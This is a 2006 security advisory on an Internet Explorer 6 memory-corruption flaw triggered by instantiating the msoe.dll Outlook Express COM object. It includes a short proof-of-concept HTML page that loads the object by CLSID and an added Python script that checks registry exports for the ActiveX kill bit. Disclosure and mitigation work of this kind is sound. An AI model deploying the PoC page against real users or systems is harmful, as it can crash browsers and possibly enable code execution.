Advisory ID:
XSec-06-04
Advisory Name:
Internet Explorer (msoe.dll) COM Object Instantiation Vulnerability
Release Date:
08/15/2006
Tested on:
Internet Explorer 6.0 SP1 on Microsoft Windows 2000 SP4 / XP SP2 CN
Affected version:
Internet Explorer 6.0
Author:
nop <nop#xsec.org>
http://www.xsec.org
Overview:
A vulnerability has been found in Internet Explorer 6.0. When Internet Explorer tries to instantiate the msoe.dll (Outlook Express) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker can cause a denial of service and possibly execute arbitrary code.
Exploit:
=============== msoe.dll.htm start ================
<!--
// Internet Explorer (msoe.dll) COM Object Instantiation Vulnerability
// tested: 2000SP4/XPSP2 CN
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {233A9694-667E-11d1-9DFB-006097D50408}
// Info: Outlook Express Address Book
// ProgID: OutlookExpress.AddressBook.1
// InprocServer32: %ProgramFiles%\Outlook Express\msoe.dll
--!>
<html><body>
<object classid="CLSID:{233A9694-667E-11d1-9DFB-006097D50408}" ></object>
</body></html>
=============== msoe.dll.htm end ==================
Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=10
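Kill-bit check:
A defensive check for the CLSID above, added here as an example and not part of the original advisory. The ActiveX kill bit (the 0x400 bit of the "Compatibility Flags" value under Internet Explorer's "ActiveX Compatibility" registry key) stops IE from instantiating a COM class, and this Python script audits registry export text for it. The function names and the sample exports are constructed for illustration.

```python
import re

KILL_BIT = 0x400  # "Compatibility Flags" bit that blocks instantiation in IE
COMPAT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
MSOE_CLSID = "{233A9694-667E-11d1-9DFB-006097D50408}"  # CLSID from the advisory

def compat_flags(reg_text):
    """Map upper-cased CLSID -> Compatibility Flags found in .reg export text.

    Version 5.00 exports are UTF-16; decode the file before calling.
    """
    flags, current = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            # Key header: track it only if it is a direct child of COMPAT_KEY.
            m = re.fullmatch(r"\[(.+)\\(\{[0-9A-Fa-f-]{36}\})\]", line)
            current = None
            if m and m.group(1).upper() == COMPAT_KEY.upper():
                current = m.group(2).upper()
                flags.setdefault(current, 0)  # key exists, value may be absent
        elif current:
            m = re.fullmatch(r'"Compatibility Flags"=dword:([0-9a-f]{1,8})', line, re.I)
            if m:
                flags[current] = int(m.group(1), 16)
    return flags

def is_killed(reg_text, clsid=MSOE_CLSID):
    """True only if the CLSID has an entry whose flags include the kill bit."""
    return bool(compat_flags(reg_text).get(clsid.upper(), 0) & KILL_BIT)

# Constructed sample exports (not taken from a real host).
KILLED = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{233A9694-667E-11D1-9DFB-006097D50408}]
"Compatibility Flags"=dword:00000400
"""
NOT_KILLED = KILLED.replace("dword:00000400", "dword:00000020")

if __name__ == "__main__":
    for name, text in (("KILLED", KILLED), ("NOT_KILLED", NOT_KILLED), ("EMPTY", "")):
        print(name, "kill bit set:", is_killed(text))
```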
About XSec:
We are redhat.